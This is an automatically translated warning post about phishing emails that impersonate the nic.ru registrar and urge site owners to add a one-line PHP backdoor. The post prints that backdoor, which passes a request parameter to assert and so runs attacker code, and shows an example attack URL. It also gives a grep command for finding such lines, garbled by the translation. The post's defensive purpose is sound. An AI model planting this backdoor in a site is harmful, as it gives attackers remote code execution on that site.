תשומת לב ל"מנהלי אתרים "שאינם יודעים PHP. פגיעות.
זהו תרגום אוטומטי.
לחץ כאן לקריאת הפרסום בשפת המקור.
היום כמה מחברי קיבלו מכתבים, לכאורה ממרכז ה RU (רשם שמות הדומיינים הרוסי הגדול ביותר) — nic.ru , עם התוכן הבא:
מכתבים נשלחו מאת [email protected] . במכתב, התוקפים, המייצגים את עצמם מטעם מרכז הרופאים, מציעים להציב את הקוד הבא באתר:
<?php assert(stripslashes($_REQUEST[RUCENTER])); ?>למרבה הצער, רבים מעמיתינו, המכנים עצמם "מנהלי אתרים" (בעלי אתרים רבים), אינם מכירים PHP ואינם חושבים על הסכנות של הקוד הנ"ל. אם תעביר מחרוזת כפרמטר לפונקציה זו, היא תיחשב על ידי assert () כקוד PHP! היו זהירים!
אני ממליץ שתבדוק את הפרויקטים שלך ב- php באמצעות פקודות assert או eval. אם פקודות אלה קיימות בקוד הפרויקט, אל תיבהל — למד את האלגוריתם שלהן. שימוש מורשה באלגוריתמים אפשרי בהחלט. במקרה של הדוגמה לעיל, הפקודה תאפשר לתוקפים להתקשר לאתר שלך, למשל, באמצעות הפרמטר RUCENTER- http://sistema-audit.ru/?RUCENTER=PHP-code
אנו ממליצים לבצע חיפוש באמצעות, למשל, הפקודה linux grep —i —r 'assert' / home / www / mysite / * המציין את התיקייה עם קבצי האתר על מנת לקבל רשימת קבצים שבהם החשוד מופע משמש קוד.
שמור על עצמך ועל האתרים שלך!
זהו תרגום אוטומטי.
לחץ כאן לקריאת הפרסום בשפת המקור.
